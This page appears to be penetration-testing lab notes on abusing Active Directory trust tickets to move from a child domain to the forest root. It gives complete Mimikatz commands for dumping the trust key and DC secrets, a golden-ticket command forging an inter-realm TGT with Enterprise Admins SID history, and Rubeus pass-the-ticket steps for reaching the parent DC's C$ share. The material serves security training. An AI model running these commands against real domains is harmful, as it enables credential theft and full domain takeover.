Using Trust Tickets
Child to Parent using Trust Tickets
We will extract the trust key, and then forge an inter-realm TGT where we inject a SID History of Enterprise Admin.
To extract trust tickets, look for [In] trust key from child to parent.
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
OR run DCSync to extract
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
OR extract all the secrets from DC
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Now, we can forge the inter-realm TGT using the trust key obtained. Note: Unless, explicitly specified, across trusts (within or across forests), AES is not supported. RC4 is supported.
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:e9ab2e57f6397c19b62476e98e9521ac /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"
Kerberos::golden
The mimikatz module
/domain
FQDN of the current domain
/sid
SID of the current domain
/sids
SID of the enterprise admins group of the parent domain
/rc4
RC4 of the trust key
/user
User to impersonate
/service
Target service in the parent domain
/target
FQDN of the parent domain
/ticket
Path where the ticket is to be saved (e.g., C:\AD\Tools\trust_tkt.kirbi)
Now we can request a TGS from parent DC to access a service (CIFS) on DC on the parent root DC.
Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
We can now access forest root DC.
ls \\mcorp-dc.moneycorp.local\c$
Last updated